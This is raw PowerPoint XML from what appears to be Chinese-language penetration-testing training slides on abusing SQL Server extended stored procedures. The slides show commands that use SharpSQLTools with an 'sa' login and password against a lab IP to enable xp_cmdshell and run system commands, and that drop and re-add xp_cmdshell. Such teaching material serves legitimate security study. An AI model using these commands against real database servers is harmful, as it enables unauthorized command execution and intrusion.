              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> ICQsafe666 master </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>enable_xp_cmdshell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>SharpSQLTools.exe 192.168.172.140 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> ICQsafe666 master </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76B0AE06-1ACE-4D66-86A7-4FEB98C7CA16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="254322" y="4470253"/>
            <a:ext cx="11683356" cy="2264641"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27544043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2"/>
            <a:ext cx="11035409" cy="28315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扩展存储过程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开头，主要使用外部程序语言编写的存储过程。</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直接利用其执行命令， </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xp_subdirs</a:t>
            </a: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读取文件夹内的文件夹列表等</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b="1"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b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>扩展利用</a:t>
            </a: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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27D6C5DD-85E5-45F5-ACB4-9F24B45E110F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4489459" y="3429001"/>
            <a:ext cx="3213079" cy="61554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en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>执行系统命令</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>exec master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8200A040-D23E-45CB-B2E2-7FA00B586E78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2360000" y="4205256"/>
            <a:ext cx="7471997" cy="2634689"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22005091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43840" y="335251"/>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基本使用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="369994" y="1473928"/>
            <a:ext cx="11452013" cy="370613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spcAft>
                <a:spcPts val="667"/>
              </a:spcAft>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里面的数据库级别设置：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="609585">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="667"/>
              </a:spcAft>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="Helvetica"/>
            </a:endParaRP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服务器级 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>数据库级 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>架构级 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>- &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>数据对象级，比如说：</a:t>
            </a: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endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="Helvetica"/>
            </a:endParaRP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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Server.DataBase1.dbo.Table1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="609585">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="667"/>
              </a:spcAft>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="Helvetica"/>
            </a:endParaRP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这里的意思就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Table1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>这个表属于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>dbo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>这个架构，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>dbo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>这个架构属于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>DataBase1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>这个数据库，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>DataBase1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>这个数据库属于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>这个服务器。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="401712052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2"/>
            <a:ext cx="11035409" cy="28315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扩展存储过程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开头，主要使用外部程序语言编写的存储过程。</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直接利用其执行命令， </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xp_subdirs</a:t>
            </a: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读取文件夹内的文件夹列表等</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b="1"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b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>扩展利用</a:t>
            </a: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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27D6C5DD-85E5-45F5-ACB4-9F24B45E110F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1463493" y="3871464"/>
            <a:ext cx="8985395" cy="209287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zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>删除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>存储过程</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>sp_dropextendedproc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>重新添加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>存储过程</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>EXEC </a:t>
            </a:r>
            <a:r>
